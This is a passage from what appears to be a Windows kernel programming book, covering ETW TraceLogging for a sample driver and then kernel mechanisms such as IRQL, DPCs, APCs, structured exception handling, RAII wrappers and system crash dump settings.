Visual Studio (Tools menu). Figure 5-11 shows a screenshot of the tool with the second radio button selected,
as it’s the closest to the format we need. Click the Copy button to copy that text to the clipboard.
Figure 5-11: The Create GUID tool
Paste the text to the main source file of the driver and change the pasted macro to
TRACELOGGING_DEFINE_PROVIDER to look like this:
// {B2723AD5-1678-446D-A577-8599D3E85ECB}
TRACELOGGING_DEFINE_PROVIDER(g_Provider, "Booster",
    (0xb2723ad5, 0x1678, 0x446d, 0xa5, 0x77, 0x85, 0x99, 0xd3, 0xe8, 0x5e, 0xcb));
g_Provider is a global variable created to represent the ETW provider, where “Booster” is set as its
friendly name.
You will need to add the following #includes (these are common with user-mode):
#include <TraceLoggingProvider.h>
#include <evntrace.h>
In DriverEntry, call TraceLoggingRegister to register the provider:
TraceLoggingRegister(g_Provider);
Similarly, the provider should be deregistered in the unload routine like so:
TraceLoggingUnregister(g_Provider);
The logging is done with the TraceLoggingWrite macro that is provided a variable number of
arguments using another set of macros that provide convenient usage for typed properties. Here is an
example of a logging call in DriverEntry:
TraceLoggingWrite(g_Provider, "DriverEntry started",           // provider, event name
    TraceLoggingLevel(TRACE_LEVEL_INFORMATION),                // log level
    TraceLoggingValue("Booster Driver", "DriverName"),         // value, name
    TraceLoggingUnicodeString(RegistryPath, "RegistryPath"));  // value, name
The above call means the following:
• Use the provider described by g_Provider.
• The event name is “DriverEntry started”.
• The logging level is Information (several levels are defined).
• A property named “DriverName” has the value “Booster Driver”.
• A property named “RegistryPath” has the value of the RegistryPath variable.
Notice the usage of the TraceLoggingValue macro - it’s the most generic and uses the type inferred by
the first argument (the value). Many other type-safe macros exist, such as the TraceLoggingUnicode-
String macro above that ensures its first argument is indeed a UNICODE_STRING.
Here is another example - if symbolic link creation fails:
TraceLoggingWrite(g_Provider, "Error",
TraceLoggingLevel(TRACE_LEVEL_ERROR),
TraceLoggingValue("Symbolic link creation failed", "Message"),
TraceLoggingNTStatus(status, "Status", "Returned status"));
You can use any “properties” you want. Try to provide the most important details for the event.
Here are a couple more examples, taken from the Booster project part of the samples for this chapter:
// Create/Close dispatch IRP
TraceLoggingWrite(g_Provider, "Create/Close",
TraceLoggingLevel(TRACE_LEVEL_INFORMATION),
TraceLoggingValue(
IoGetCurrentIrpStackLocation(Irp)->MajorFunction == IRP_MJ_CREATE ?
"Create" : "Close", "Operation"));
// success in changing priority
TraceLoggingWrite(g_Provider, "Boosting",
TraceLoggingLevel(TRACE_LEVEL_INFORMATION),
TraceLoggingUInt32(data->ThreadId, "ThreadId"),
TraceLoggingInt32(oldPriority, "OldPriority"),
TraceLoggingInt32(data->Priority, "NewPriority"));
Viewing ETW Traces
Where do all the above traces go? Normally, they are just dropped. Someone has to configure listening to
the provider and log the events to a real-time session or a file. The WDK provides a tool called TraceView
that can be used for just that purpose.
You can open a Developer’s Command window and run TraceView.exe directly. If you can’t locate it, it’s
installed by default in a directory such as C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x64.
You can copy the executable to the target machine where the driver is supposed to run. When you run
TraceView.exe, an empty window is shown (figure 5-12).
Figure 5-12: The TraceView.exe tool
Select the File / Create New Log Session menu to create a new session. This opens up the dialog shown in
figure 5-13.
Figure 5-13: New session dialog with a new provider
TraceView provides several methods of locating providers. We can add multiple providers to the same
session to get information from other components in the system. For now, we’ll add our provider by using
the Manually Entered Control GUID option, and type in our GUID (figure 5-14):
Figure 5-14: Adding a provider GUID manually
Click OK. A dialog will pop up asking the source for decoding information. Use the default Auto option,
as trace logging does not require any outside source. You’ll see the single provider in the Create New Log
Session dialog. Click the Next button. The last step of the wizard allows you to select where the output
should go to: a real-time session (shown with TraceView), a file, or both (figure 5-15).
Figure 5-15: Output selection for a session
Click Finish. Now you can load/use the driver normally. You should see the output generated in the main
TraceView window (figure 5-16).
Figure 5-16: ETW real-time session in action
You can see the various properties shown in the Message column. When logging to a file, you can open
the file later with TraceView and see what was logged.
There are other ways to use TraceView, and other tools to record and view ETW information. You could
also write your own tools to parse the ETW log, as the events have semantic information and so can easily
be analyzed.
Summary
In this chapter, we looked at the basics of debugging with WinDbg, as well as tracing activities within the
driver. Debugging is an essential skill to develop, as software of all kinds, including kernel drivers, may
have bugs.
In the next chapter, we’ll delve into some kernel mechanisms we need to get acquainted with, as these
come up frequently while developing and debugging drivers.
Chapter 6: Kernel Mechanisms
This chapter discusses various mechanisms the Windows kernel provides. Some of these are directly useful
for driver writers. Others are mechanisms that a driver developer needs to understand, as they help with
debugging and general understanding of activities in the system.
In this chapter:
• Interrupt Request Level
• Deferred Procedure Calls
• Asynchronous Procedure Calls
• Structured Exception Handling
• System Crash
• Thread Synchronization
• High IRQL Synchronization
• Work Items
Interrupt Request Level (IRQL)
In chapter 1, we discussed threads and thread priorities. These priorities are taken into consideration when
more threads want to execute than there are available processors. At the same time, hardware devices
need to notify the system that something requires attention. A simple example is an I/O operation that is
carried out by a disk drive. Once the operation completes, the disk drive notifies completion by requesting
an interrupt. This interrupt is connected to an Interrupt Controller hardware that then sends the request
to a processor for handling. The next question is, which thread should execute the associated Interrupt
Service Routine (ISR)?
Every hardware interrupt is associated with a priority, called Interrupt Request Level (IRQL) (not to be
confused with an interrupt physical line known as IRQ), determined by the HAL. Each processor’s context
has its own IRQL, just like any register. IRQLs may or may not be implemented by the CPU hardware, but
this is essentially unimportant. IRQL should be treated just like any other CPU register.
The basic rule is that a processor executes the code with the highest IRQL. For example, if a CPU’s IRQL is
zero at some point, and an interrupt with an associated IRQL of 5 comes in, it will save its state (context) in
the current thread’s kernel stack, raise its IRQL to 5 and then execute the ISR associated with the interrupt.
Once the ISR completes, the IRQL will drop to its previous level, resuming the previously executed code
as though the interrupt never happened. While the ISR is executing, other interrupts coming in with an
IRQL of 5 or less cannot interrupt this processor. If, on the other hand, the IRQL of the new interrupt is
above 5, the CPU will save its state again, raise IRQL to the new level, execute the second ISR associated
with the second interrupt and when completed, will drop back to IRQL 5, restore its state and continue
executing the original ISR. Essentially, raising IRQL blocks code with equal or lower IRQL temporarily.
The basic sequence of events when an interrupt occurs is depicted in figure 6-1. Figure 6-2 shows what
interrupt nesting looks like.
Figure 6-1: Basic interrupt dispatching
Figure 6-2: Nested interrupts
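The raise-on-interrupt, restore-on-completion behavior shown in figures 6-1 and 6-2 can be modeled with a toy processor structure. This is purely illustrative; real IRQL handling is done by the kernel and HAL:

```cpp
#include <vector>

// Toy model of per-processor IRQL: an incoming interrupt runs its ISR only
// if its IRQL is higher than the processor's current IRQL; the previous
// level is saved and restored when the ISR completes.
struct Processor {
    std::vector<int> saved;  // saved IRQLs (the interrupted contexts)
    int irql = 0;            // PASSIVE_LEVEL

    // Returns true if the interrupt's ISR runs now; false if masked.
    bool Interrupt(int interruptIrql) {
        if (interruptIrql <= irql)
            return false;            // pending until IRQL drops
        saved.push_back(irql);       // save state and raise IRQL
        irql = interruptIrql;
        return true;
    }

    void IsrComplete() {             // restore the previous IRQL
        irql = saved.back();
        saved.pop_back();
    }
};
```

Running the scenario from the text (an interrupt at IRQL 5, a second one at the same level, then a higher one at 8) shows the same masking and nesting order as the figures.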
An important fact for the depicted scenarios in figures 6-1 and 6-2 is that execution of all ISRs is done
by the same thread - which got interrupted in the first place. Windows does not have a special thread
to handle interrupts; they are handled by whatever thread was running at that time on the interrupted
processor. As we’ll soon discover, context switching is not possible when the IRQL of the processor is 2 or
higher, so there is no way another thread can sneak in while these ISRs execute.
The interrupted thread does not get its quantum reduced because of these “interruptions”. It’s not its
fault, so to speak.
When user-mode code is executing, the IRQL is always zero. This is one reason why the term IRQL is not
mentioned in any user-mode documentation - it’s always zero and cannot be changed. Most kernel-mode
code runs with IRQL zero as well. It’s possible, however, in kernel mode, to raise the IRQL on the current
processor.
The important IRQLs are described below:
• PASSIVE_LEVEL in WDK (0) - this is the “normal” IRQL for a CPU. User-mode code always runs
at this level. Thread scheduling works normally, as described in chapter 1.
• APC_LEVEL (1) - used for special kernel APCs (Asynchronous Procedure Calls will be discussed later
in this chapter). Thread scheduling works normally.
• DISPATCH_LEVEL (2) - this is where things change radically. The scheduler cannot wake up on this
CPU. Paged memory access is not allowed - such access causes a system crash. Since the scheduler
cannot interfere, waiting on kernel objects is not allowed (causes a system crash if used).
• Device IRQL - a range of levels used for hardware interrupts (3 to 11 on x64/ARM/ARM64, 3 to 26
on x86). All rules from IRQL 2 apply here as well.
• Highest level (HIGH_LEVEL) - this is the highest IRQL, masking all interrupts. Used by some APIs
dealing with linked list manipulation. The actual values are 15 (x64/ARM/ARM64) and 31 (x86).
When a processor’s IRQL is raised to 2 or higher (for whatever reason), certain restrictions apply on the
executing code:
• Accessing memory not in physical memory is fatal and causes a system crash. This means accessing
data from non-paged pool is always safe, whereas accessing data from paged pool or from user-
supplied buffers is not safe and should be avoided.
• Waiting on any kernel object (e.g. mutex or event) causes a system crash, unless the wait timeout is
zero, which is still allowed. (We'll discuss dispatcher objects and waiting later in this chapter, in the
“Thread Synchronization” section.)
These restrictions are due to the fact that the scheduler “runs” at IRQL 2; so if a processor’s IRQL is already
2 or higher, the scheduler cannot wake up on that processor, so context switches (replacing the running
thread with another on this CPU) cannot occur. Only higher level interrupts can temporarily divert code
into an associated ISR, but it’s still the same thread - no context switch can occur; the thread’s context is
saved, the ISR executes and the thread’s state resumes.
The current IRQL of a processor can be viewed while debugging with the !irql command.
An optional CPU number can be specified, which shows the IRQL of that CPU.
You can view the registered interrupts on a system using the !idt debugger command.
Raising and Lowering IRQL
As previously discussed, in user mode the concept of IRQL is not mentioned and there is no way to
change it. In kernel mode, the IRQL can be raised with the KeRaiseIrql function and lowered back with
KeLowerIrql. Here is a code snippet that raises the IRQL to DISPATCH_LEVEL (2), and then lowers it
back after executing some instructions at this IRQL.
// assuming current IRQL <= DISPATCH_LEVEL
KIRQL oldIrql;    // typedefed as UCHAR
KeRaiseIrql(DISPATCH_LEVEL, &oldIrql);
NT_ASSERT(KeGetCurrentIrql() == DISPATCH_LEVEL);

// do work at IRQL DISPATCH_LEVEL

KeLowerIrql(oldIrql);
If you raise IRQL, make sure you lower it in the same function. It’s too dangerous to return from
a function with a higher IRQL than it was entered. Also, make sure KeRaiseIrql actually
raises the IRQL and KeLowerIrql actually lowers it; otherwise, a system crash will follow.
Thread Priorities vs. IRQLs
IRQL is an attribute of a processor. Priority is an attribute of a thread.
Thread priorities only have meaning at IRQL < 2. Once an executing thread raises IRQL to 2 or higher,
its priority no longer means anything - it theoretically has an infinite quantum - it will continue
executing until it lowers the IRQL below 2.
Naturally, spending a lot of time at IRQL >= 2 is not a good thing; user-mode code certainly cannot run.
This is just one reason there are severe restrictions on what executing code can do at these levels.
Task Manager shows the amount of CPU time spent in IRQL 2 or higher using a pseudo-process called
System Interrupts; Process Explorer calls it Interrupts. Figure 6-3 shows a screenshot from Task Manager
and figure 6-4 shows the same information in Process Explorer.
Figure 6-3: IRQL 2+ CPU time in Task Manager
Figure 6-4: IRQL 2+ CPU time in Process Explorer
Deferred Procedure Calls
Figure 6-5 shows a typical sequence of events when a client invokes some I/O operation. In this figure,
a user mode thread opens a handle to a file, and issues a read operation using the ReadFile function.
Since the thread can make an asynchronous call, it regains control almost immediately and can do other
work. The driver receiving this request calls the file system driver (e.g. NTFS), which may call other
drivers below it, until the request reaches the disk driver, which initiates the operation on the actual disk
hardware. At that point, no code needs to execute, since the hardware “does its thing”.
When the hardware is done with the read operation, it issues an interrupt. This causes the Interrupt Service
Routine associated with the interrupt to execute at Device IRQL (note that the thread handling the request
is arbitrary, since the interrupt arrives asynchronously). A typical ISR accesses the device’s hardware to
get the result of the operation. Its final act should be to complete the initial request.
Figure 6-5: Typical I/O request processing (part 1)
As we’ve seen in chapter 4, completing a request is done by calling IoCompleteRequest. The problem
is that the documentation states this function can only be called at IRQL <= DISPATCH_LEVEL (2). This
means the ISR cannot call IoCompleteRequest or it will crash the system. So what is the ISR to do?
You may wonder why there is such a restriction. One of the reasons has to do with the work
done by IoCompleteRequest. We’ll discuss this in more detail in the next chapter, but the
bottom line is that this function is relatively expensive. If the call were allowed,
the ISR would take substantially longer to execute, and since it executes at a
high IRQL, it would mask off other interrupts for a longer period of time.
The mechanism that allows the ISR to call IoCompleteRequest (and other functions with similar
limitations) as soon as possible is the Deferred Procedure Call (DPC). A DPC is an object encapsulating
a function that is to be called at IRQL DISPATCH_LEVEL. At this IRQL, calling IoCompleteRequest is
permitted.
You may wonder why the ISR does not simply lower the current IRQL to DISPATCH_LEVEL,
call IoCompleteRequest, and then raise the IRQL back to its original value. This can cause
a deadlock. We’ll discuss the reason for that later in this chapter in the section Spin Locks.
The driver which registered the ISR prepares a DPC in advance, by allocating a KDPC structure from non-
paged pool and initializing it with a callback function using KeInitializeDpc. Then, when the ISR is
called, just before exiting the function, the ISR requests the DPC to execute as soon as possible by queuing
it using KeInsertQueueDpc. When the DPC function executes, it calls IoCompleteRequest. So the
DPC serves as a compromise - it runs at IRQL DISPATCH_LEVEL, meaning no scheduling and no
paged-memory access can occur, but that level is not high enough to prevent hardware interrupts
from coming in and being serviced on the same processor.
Every processor on the system has its own queue of DPCs. By default, KeInsertQueueDpc queues the
DPC to the current processor’s DPC queue. When the ISR returns, before the IRQL can drop back to zero, a
check is made to see whether DPCs exist in the processor’s queue. If there are, the processor drops to IRQL
DISPATCH_LEVEL (2) and then processes the DPCs in the queue in a First In First Out (FIFO) manner,
calling the respective functions, until the queue is empty. Only then can the processor’s IRQL drop to zero,
and resume executing the original code that was disturbed at the time the interrupt arrived.
DPCs can be customized in some ways. Check out the docs for the functions
KeSetImportanceDpc and KeSetTargetProcessorDpc.
Figure 6-6 augments figure 6-5 with the DPC routine execution.
Figure 6-6: Typical I/O request processing (part 2)
Using DPC with a Timer
DPCs were originally created for use by ISRs. However, there are other mechanisms in the kernel that
utilize DPCs.
One such use is with a kernel timer. A kernel timer, represented by the KTIMER structure, allows setting
up a timer to expire some time in the future, based on a relative interval or an absolute time. This timer is
a dispatcher object and so can be waited upon with KeWaitForSingleObject (discussed later in this
chapter in the section “Synchronization”). Although waiting is possible, it’s inconvenient for a timer. A
simpler approach is to have a callback invoked when the timer expires. This is exactly what the kernel
timer provides, using a DPC as its callback.
The following code snippet shows how to configure a timer and associate it with a DPC. When the timer
expires, the DPC is inserted into a CPU’s DPC queue and so executes as soon as possible. Using a DPC is
more powerful than a zero IRQL based callback, since it is guaranteed to execute before any user mode
code (and most kernel mode code).
KTIMER Timer;
KDPC TimerDpc;

void InitializeAndStartTimer(ULONG msec) {
    KeInitializeTimer(&Timer);
    KeInitializeDpc(&TimerDpc,
        OnTimerExpired,   // callback function
        nullptr);         // passed to callback as "context"

    // relative interval is in 100nsec units (and must be negative)
    // convert from msec by multiplying by 10000
    LARGE_INTEGER interval;
    interval.QuadPart = -10000LL * msec;

    KeSetTimer(&Timer, interval, &TimerDpc);
}
void OnTimerExpired(KDPC* Dpc, PVOID context, PVOID, PVOID) {
    UNREFERENCED_PARAMETER(Dpc);
    UNREFERENCED_PARAMETER(context);

    NT_ASSERT(KeGetCurrentIrql() == DISPATCH_LEVEL);

    // handle timer expiration
}
Asynchronous Procedure Calls
We’ve seen in the previous section that DPCs are objects encapsulating a function to be called at IRQL
DISPATCH_LEVEL. The calling thread does not matter, as far as DPCs are concerned.
Asynchronous Procedure Calls (APCs) are also data structures that encapsulate a function to be called. But
contrary to a DPC, an APC is targeted towards a particular thread, so only that thread can execute the
function. This means each thread has an APC queue associated with it.
There are three types of APCs:
• User mode APCs - these execute in user mode at IRQL PASSIVE_LEVEL only when the thread
goes into alertable state. This is typically accomplished by calling an API such as SleepEx,
WaitForSingleObjectEx, WaitForMultipleObjectsEx and similar APIs. The last argument
to these functions can be set to TRUE to put the thread in an alertable state. In this state, the thread
examines its APC queue, and if it is not empty, the APCs execute until the queue is empty.
• Normal kernel-mode APCs - these execute in kernel mode at IRQL PASSIVE_LEVEL and preempt
user-mode code (and user-mode APCs).
• Special kernel APCs - these execute in kernel mode at IRQL APC_LEVEL (1) and preempt user-
mode code, normal kernel APCs, and user-mode APCs. These APCs are used by the I/O manager to
complete I/O operations as will be discussed in the next chapter.
The APC API is undocumented in kernel mode (though it has been reverse engineered enough to allow
usage if desired).
User-mode code can use (user-mode) APCs by calling certain APIs. For example, calling
ReadFileEx or WriteFileEx starts an asynchronous I/O operation. When the operation
completes, a user-mode APC is attached to the calling thread. This APC will execute when
the thread enters an alertable state as described earlier. Another useful function in user mode
to explicitly generate an APC is QueueUserAPC. Check out the Windows API documentation
for more information.
Critical Regions and Guarded Regions
A Critical Region prevents user mode and normal kernel APCs from executing (special kernel APCs
can still execute). A thread enters a critical region with KeEnterCriticalRegion and leaves it with
KeLeaveCriticalRegion. Some functions in the kernel require being inside a critical region, especially
when working with executive resources (see the section “Executive Resources” later in this chapter).
A Guarded Region prevents all APCs from executing. Call KeEnterGuardedRegion to enter a guarded
region and KeLeaveGuardedRegion to leave it. Recursive calls to KeEnterGuardedRegion must be
matched with the same number of calls to KeLeaveGuardedRegion.
Raising the IRQL to APC_LEVEL disables delivery of all APCs.
Write RAII wrappers for entering/leaving critical and guarded regions.
Structured Exception Handling
An exception is an event that occurs when an instruction does something that causes the processor
to raise an error. Exceptions are in some ways similar to interrupts, the main difference being
that an exception is synchronous and technically reproducible under the same conditions, whereas an
interrupt is asynchronous and can arrive at any time. Examples of exceptions include division by zero,
breakpoint, page fault, stack overflow and invalid instruction.
If an exception occurs, the kernel catches this and allows code to handle the exception, if possible. This
mechanism is called Structured Exception Handling (SEH) and is available for user-mode code as well as
kernel-mode code.
The kernel exception handlers are called based on the Interrupt Descriptor Table (IDT), the same table
that holds the mappings between interrupt vectors and ISRs. Using a kernel debugger, the !idt command shows
all these mappings. The low-numbered interrupt vectors are in fact exception handlers. Here’s a sample output
from this command:
lkd> !idt
Dumping IDT: fffff8011d941000
00: fffff8011dd6c100 nt!KiDivideErrorFaultShadow
01: fffff8011dd6c180 nt!KiDebugTrapOrFaultShadow
Stack = 0xFFFFF8011D9459D0
02: fffff8011dd6c200 nt!KiNmiInterruptShadow
Stack = 0xFFFFF8011D9457D0
03: fffff8011dd6c280 nt!KiBreakpointTrapShadow
04: fffff8011dd6c300 nt!KiOverflowTrapShadow
05: fffff8011dd6c380 nt!KiBoundFaultShadow
06: fffff8011dd6c400 nt!KiInvalidOpcodeFaultShadow
07: fffff8011dd6c480 nt!KiNpxNotAvailableFaultShadow
08: fffff8011dd6c500 nt!KiDoubleFaultAbortShadow
Stack = 0xFFFFF8011D9453D0
09: fffff8011dd6c580 nt!KiNpxSegmentOverrunAbortShadow
0a: fffff8011dd6c600 nt!KiInvalidTssFaultShadow
0b: fffff8011dd6c680 nt!KiSegmentNotPresentFaultShadow
0c: fffff8011dd6c700 nt!KiStackFaultShadow
0d: fffff8011dd6c780 nt!KiGeneralProtectionFaultShadow
0e: fffff8011dd6c800 nt!KiPageFaultShadow
10: fffff8011dd6c880 nt!KiFloatingErrorFaultShadow
11: fffff8011dd6c900 nt!KiAlignmentFaultShadow
(truncated)
Note the function names - most are very descriptive. These entries are connected to Intel/AMD (in this
example) faults. Some common examples of exceptions include:
• Division by zero (0)
• Breakpoint (3) - the kernel handles this transparently, passing control to an attached debugger (if
any).
• Invalid opcode (6) - this fault is raised by the CPU if it encounters an unknown instruction.
• Page fault (14) - this fault is raised by the CPU if the page table entry used for translating virtual to
physical addresses has the Valid bit set to zero, indicating (as far as the CPU is concerned) that the
page is not resident in physical memory.
Some other exceptions are raised by the kernel as a result of a previous CPU fault. For example, if a page
fault is raised, the Memory Manager’s page fault handler will try to locate the page that is not resident in
RAM. If the page happens not to exist at all, the Memory Manager will raise an Access Violation exception.
Once an exception is raised, the kernel searches the function where the exception occurred for a handler
(except for some exceptions which it handles transparently, such as Breakpoint (3)). If not found, it will
search up the call stack, until such handler is found. If the call stack is exhausted, the system will crash.
How can a driver handle these types of exceptions? Microsoft added four keywords to the C language to
allow developers to handle such exceptions, as well as have code execute no matter what. Table 6-1 shows
the added keywords with a brief description.
Table 6-1: Keywords for working with SEH
Keyword      Description
__try        Starts a block of code where exceptions may occur.
__except     Indicates if an exception is handled, and provides the handling code if it is.
__finally    Unrelated to exceptions directly. Provides code that is guaranteed to execute no
             matter what - whether the __try block is exited normally, with a return statement,
             or because of an exception.
__leave      Provides an optimized mechanism to jump to the __finally block from somewhere
             within a __try block.
The valid combinations of keywords are __try/__except and __try/__finally. However, these can be
combined by nesting to any level.
These same keywords work in user mode as well, in much the same way.
Using __try/__except
In chapter 4, we implemented a driver that accesses a user-mode buffer to get data needed for the driver’s
operation. We used a direct pointer to the user’s buffer. However, this is not guaranteed to be safe. For
example, the user-mode code (say from another thread) could free the buffer, just before the driver accesses
it. In such a case, the driver would cause a system crash, essentially because of a user’s error (or malicious
intent). Since user data should never be trusted, such access should be wrapped in a __try/__except
block to make sure a bad buffer does not crash the driver.
Here is the important part of a revised IRP_MJ_WRITE handler using an exception handler:
do {
    if (irpSp->Parameters.Write.Length < sizeof(ThreadData)) {
        status = STATUS_BUFFER_TOO_SMALL;
        break;
    }

    auto data = (ThreadData*)Irp->UserBuffer;
    if (data == nullptr) {
        status = STATUS_INVALID_PARAMETER;
        break;
    }

    __try {
        if (data->Priority < 1 || data->Priority > 31) {
            status = STATUS_INVALID_PARAMETER;
            break;
        }

        PETHREAD Thread;
        status = PsLookupThreadByThreadId(
            ULongToHandle(data->ThreadId), &Thread);
        if (!NT_SUCCESS(status))
            break;

        KeSetPriorityThread((PKTHREAD)Thread, data->Priority);
        ObDereferenceObject(Thread);
        KdPrint(("Thread Priority change for %d to %d succeeded!\n",
            data->ThreadId, data->Priority));
        break;
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        // probably something wrong with the buffer
        status = STATUS_ACCESS_VIOLATION;
    }
} while (false);
Placing EXCEPTION_EXECUTE_HANDLER in __except says that any exception is to be handled. We can
be more selective by calling GetExceptionCode and examining the actual exception. If it’s not one we
expect, we can tell the kernel to continue looking for handlers up the call stack:
__except (GetExceptionCode() == STATUS_ACCESS_VIOLATION
? EXCEPTION_EXECUTE_HANDLER : EXCEPTION_CONTINUE_SEARCH) {
// handle exception
}
Does all this mean that the driver can catch any and all exceptions? If so, the driver will never cause a
system crash. Fortunately (or unfortunately, depending on your perspective), this is not the case. Access
violation, for example, is something that can only be caught if the violating address is in user space. If it’s
in kernel space, it cannot be caught and will still cause a system crash. This makes sense, since something bad
has happened and the kernel will not let the driver get away with it. User-mode addresses, on the other
hand, are not under the control of the driver, so such exceptions can be caught and handled.
The SEH mechanism can also be used by drivers (and user-mode code) to raise custom exceptions. The
kernel provides the generic function ExRaiseStatus to raise any exception and some specific functions
like ExRaiseAccessViolation:
void ExRaiseStatus(NTSTATUS Status);
A driver can also crash the system explicitly if it concludes that something really bad is going on, such as data
being corrupted from underneath the driver. The kernel provides the KeBugCheckEx function for this purpose:
VOID KeBugCheckEx(
    _In_ ULONG BugCheckCode,
    _In_ ULONG_PTR BugCheckParameter1,
    _In_ ULONG_PTR BugCheckParameter2,
    _In_ ULONG_PTR BugCheckParameter3,
    _In_ ULONG_PTR BugCheckParameter4);
KeBugCheckEx is the normal kernel function that generates a crash. BugCheckCode is the crash code to
be reported, and the other 4 numbers can provide more details about the crash. If the bugcheck code is one
of those documented by Microsoft, the meaning of the other 4 numbers must be provided as documented.
(See the next section System Crash for more details).
Using __try/__finally
Using a block of __try and __finally is not directly related to exceptions. This is about making sure
some piece of code executes no matter what - whether the code exits cleanly or mid-way because of an
exception. This is similar in concept to the finally keyword popular in some high level languages (e.g.
Java, C#). Here is a simple example to show the problem:
void foo() {
    void* p = ExAllocatePoolWithTag(PagedPool, 1024, DRIVER_TAG);
    if (p == nullptr)
        return;

    // do something with p

    ExFreePool(p);
}
The above code seems harmless enough. However, there are several issues with it:
• If an exception is thrown between the allocation and the release, a handler in the caller will be
searched, but the memory will not be freed.
• If a return statement is used in some conditional between the allocation and release, the buffer
will not be freed. This requires the code to be careful to make sure all exit points from the function
pass through the code freeing the buffer.
The second issue can be addressed with careful coding, but that is a burden best avoided. The first issue
cannot be handled with standard coding techniques at all. This is where __try/__finally comes in. Using
this combination, we can make sure the buffer is freed no matter what happens in the __try block:
void foo() {
    void* p = ExAllocatePoolWithTag(PagedPool, 1024, DRIVER_TAG);
    if (p == nullptr)
        return;

    __try {
        // do something with p
    }
    __finally {
        // called no matter what
        ExFreePool(p);
    }
}
With the above code in place, even if return statements appear within the __try body, the __finally
code will be called before actually returning from the function. If some exception occurs, the __finally
block runs first before the kernel searches up the call stack for possible handlers.
__try/__finally is useful not just with memory allocations, but also with other resources, where some
acquisition and release need to take place. One common example is when synchronizing threads accessing
some shared data. Here is an example of acquiring and releasing a fast mutex (fast mutex and other
synchronization primitives are described later in this chapter):
FAST_MUTEX MyMutex;

void foo() {
    ExAcquireFastMutex(&MyMutex);
    __try {
        // do work while the fast mutex is held
    }
    __finally {
        ExReleaseFastMutex(&MyMutex);
    }
}
Using C++ RAII Instead of __try / __finally
Although the preceding examples with __try/__finally work, they are not terribly convenient. Using
C++ we can build RAII wrappers that do the right thing without the need to use __try/__finally. C++
does not have a finally keyword like C# or Java, but it doesn’t need one - it has destructors.
Here is a very simple, bare minimum, example that manages a buffer allocation with a RAII class:
template<typename T = void>
struct kunique_ptr {
    explicit kunique_ptr(T* p = nullptr) : _p(p) {}

    ~kunique_ptr() {
        if (_p)
            ExFreePool(_p);
    }

    T* operator->() const {
        return _p;
    }

    T& operator*() const {
        return *_p;
    }

private:
    T* _p;
};
The class uses templates to allow working easily with any type of data. An example usage follows:
struct MyData {
    ULONG Data1;
    HANDLE Data2;
};

void foo() {
    // take charge of the allocation
    kunique_ptr<MyData> data((MyData*)ExAllocatePool(PagedPool, sizeof(MyData)));

    // use the pointer
    data->Data1 = 10;

    // when the object goes out of scope, the destructor frees the buffer
}
If you don’t normally use C++ as your primary programming language, you may find the above code
confusing. You can continue working with __try/__finally, but I recommend getting acquainted
with this type of code. In any case, even if you struggle with the implementation of kunique_ptr
above, you can still use it without needing to understand every little detail.
The kunique_ptr type presented above is a bare minimum. You should also remove the copy constructor
and copy assignment operator, and allow move construction and move assignment (C++11 and later) for ownership transfer. Here
is a more complete implementation:
template<typename T = void>
struct kunique_ptr {
    explicit kunique_ptr(T* p = nullptr) : _p(p) {}

    // remove copy ctor and copy = (single owner)
    kunique_ptr(const kunique_ptr&) = delete;
    kunique_ptr& operator=(const kunique_ptr&) = delete;

    // allow ownership transfer
    kunique_ptr(kunique_ptr&& other) : _p(other._p) {
        other._p = nullptr;
    }

    kunique_ptr& operator=(kunique_ptr&& other) {
        if (&other != this) {
            Release();
            _p = other._p;
            other._p = nullptr;
        }
        return *this;
    }

    ~kunique_ptr() {
        Release();
    }

    operator bool() const {
        return _p != nullptr;
    }

    T* operator->() const {
        return _p;
    }

    T& operator*() const {
        return *_p;
    }

    void Release() {
        if (_p) {
            ExFreePool(_p);
            _p = nullptr;   // prevent a double-free if Release is called again
        }
    }

private:
    T* _p;
};
We’ll build other RAII wrappers for synchronization primitives later in this chapter.
Using C++ RAII wrappers has one missing piece - if an exception occurs, the destructor will not
be called, so a leak of some sort occurs. The reason this does not work (as it does in user mode)
is the lack of a C++ runtime and the compiler's current inability to set up the elaborate
__try/__finally code needed to mimic this effect. Even so, RAII is still very useful, as in many cases
exceptions are not expected, and even if one occurs, no handler exists in the driver for it and
the system should probably crash anyway.
System Crash
As we already know, if an unhandled exception occurs in kernel mode, the system crashes, typically with
the “Blue Screen of Death” (BSOD) showing its face (on Windows 8+, that’s literally a face - a sad or
frowny one, the inverse of a smiley). In this section, we’ll discuss what happens when the system crashes and
how to deal with it.
The system crash has many names, all meaning the same thing - “Blue screen of Death”, “System failure”,
“Bugcheck”, “Stop error”. The BSOD is not some punishment, as it may seem at first, but a protection
mechanism. If kernel code, which is supposed to be trusted, did something bad, stopping everything
is probably the safest approach, as letting the code continue roaming around could result in an
unbootable system if important files or Registry data were corrupted.
Recent versions of Windows 10 use alternate colors for some crashes. Green is used
for insider preview builds, and I have actually encountered a pink one as well (power-related errors).
If the crashed system is connected to a kernel debugger, the debugger will break. This allows examining
the state of the system before other actions take place.
The system can be configured to perform some operations if the system crashes. This can be done with the
System Properties UI on the Advanced tab. Clicking Settings… at the Startup and Recovery section brings
the Startup and Recovery dialog where the System Failure section shows the available options. Figure 6-7
shows these two dialogs.
Figure 6-7: Startup and recovery settings
If the system crashes, an event entry can be written to the event log. It’s checked by default, and there is
no good reason to change it. The system is configured to automatically restart; this has been the default
since Windows 2000.
The most important setting is the generation of a dump file. The dump file captures the system state at the
time of the crash, so it can later be analyzed by loading the dump file into the debugger. The type of the
dump file is important since it determines what information will be present in the dump. The dump is not
written to the target file at crash time, but instead written to the first page file.
Only when the system restarts does the kernel notice there is dump information in the page file and copy
the data to the target file. The reason is that at crash time it may be too
dangerous to write to a new file (or overwrite an existing one); the I/O system may not be stable
enough. The best bet is to write the data to a page file, which is already open anyway. The downside is that
the page file must be large enough to contain the dump, otherwise the dump file will not be generated.
The dump file contains physical memory only.
The dump type determines what data would be written and hints at the page file size that may be required.
Here are the options:
• Small memory dump (256 KB on Windows 8 and later, 64 KB on older systems) - a very minimal
dump, containing basic system information and information on the thread that caused the crash.
Usually this is too little to determine what happened in all but the most trivial cases. The upside is
that the file is small, so it can be easily moved.
• Kernel memory dump - this is the default on Windows 7 and earlier versions. This setting captures
all kernel memory but no user memory. This is usually good enough, since a system crash can only
be caused by kernel code misbehaving. It’s extremely unlikely that user-mode had anything to do
with it.
• Complete memory dump - this provides a dump of all physical memory, user memory and kernel
memory. This is the most complete information available. The downside is the size of the dump,
which could be gigantic depending on the size of RAM (the total size of the final file). The obvious
